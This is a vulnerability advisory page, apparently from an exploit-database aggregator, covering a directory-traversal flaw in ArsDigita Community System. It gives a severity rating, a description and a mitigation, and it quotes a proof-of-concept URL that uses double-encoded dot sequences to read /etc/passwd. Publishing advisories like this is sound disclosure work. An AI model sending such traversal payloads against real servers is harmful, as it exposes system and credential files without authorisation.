header-logo
Suggest Exploit
vendor:
ArsDigita Community System
by:
Unknown
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: ArsDigita Community System
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: a:arsdigita:community_system
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

ArsDigita Community System Directory Traversal Vulnerability

The ArsDigita Community System is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid in further attacks.

Mitigation:

Sanitize user-supplied input to prevent directory-traversal attacks. Implement proper input validation and encoding.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22121/info

ArsDigita Community System is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid in further attacks.

http://www.example.com/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd

Navigation

Suggest Exploit

Services By CQR